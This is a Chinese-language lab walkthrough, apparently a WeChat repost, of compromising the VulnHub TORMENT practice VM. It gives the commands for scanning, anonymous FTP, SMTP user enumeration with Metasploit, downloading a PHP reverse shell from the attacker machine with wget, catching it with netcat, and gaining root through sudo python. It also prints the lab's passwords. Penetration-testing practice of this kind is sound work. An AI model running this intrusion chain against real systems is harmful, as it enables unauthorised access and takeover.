本周实践的是vulnhub的TORMENT镜像,
下载地址,https://download.vulnhub.com/digitalworld/TORMENT.7z,
用workstation导入成功,
做地址扫描,sudo netdiscover -r 192.168.88.0/24,
获取到靶机地址是192.168.88.134,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.88.134,
靶机开了很多端口和服务,有常见的21、22、25、80等,
也有不常见的631、6667等,
21端口的ftp被扫出来允许匿名登录,
ftp 192.168.88.134,Anonymous,
发现ssh登录私钥,下载到kali攻击机本地,
还发现ngircd,也下载到kali攻击机本地,并查看到频道信息,
在kali攻击机上安装hexchat,sudo apt install hexchat,并运行,
继续在kali攻击机上安装ngircd,sudo apt install ngircd,
查看配置文件,cat /etc/ngircd/ngircd.conf,
获取到密码,wealllikedebian,
在hexchat里新建连接,
输入之前获取到的频道名,
连接成功后获取到新的密码,
mostmachineshaveasupersecurekeyandalongpassphrase,
浏览器访问http://192.168.88.134:631,
获取到一堆用户名,在kali攻击机上创建users文件,
上msfconsole,
use auxiliary/scanner/smtp/smtp_enum
set rhosts 192.168.88.134
set user_file /home/kali/users
exploit
扫描到用户名Patrick,
修改ssh登录私钥权限,chmod 600 id_rsa,
登录,ssh -i id_rsa [email protected],
私钥密码就是之前获取到那个长串,
查看到当前账户对apache配置文件可写,
添加另一个账户的权限,
User qiu
Group qiu
在kali攻击机上准备一个反弹shell脚本,
cp /usr/share/webshells/php/php-reverse-shell.php shell.php,
开启http下载服务,python2 -m SimpleHTTPServer,
在靶机上进入http服务目录,cd /var/www/html,
把反弹shell脚本文件下载过去,
wget http://192.168.88.131:8000/shell.php,
重启靶机,sudo /bin/systemctl reboot,
在kali攻击机上开启反弹shell监听,nc -lvp 4444,
浏览器访问靶机http://192.168.88.134/shell.php,
获取到反弹shell,转成交互式shell,
python -c 'import pty;pty.spawn("/bin/bash")',
查看sudo权限,sudo -l,获取到/usr/bin/python,
提权,sudo python -c 'import pty;pty.spawn("/bin/bash")',
获取到新的shell,是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之TORMENT的实践
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论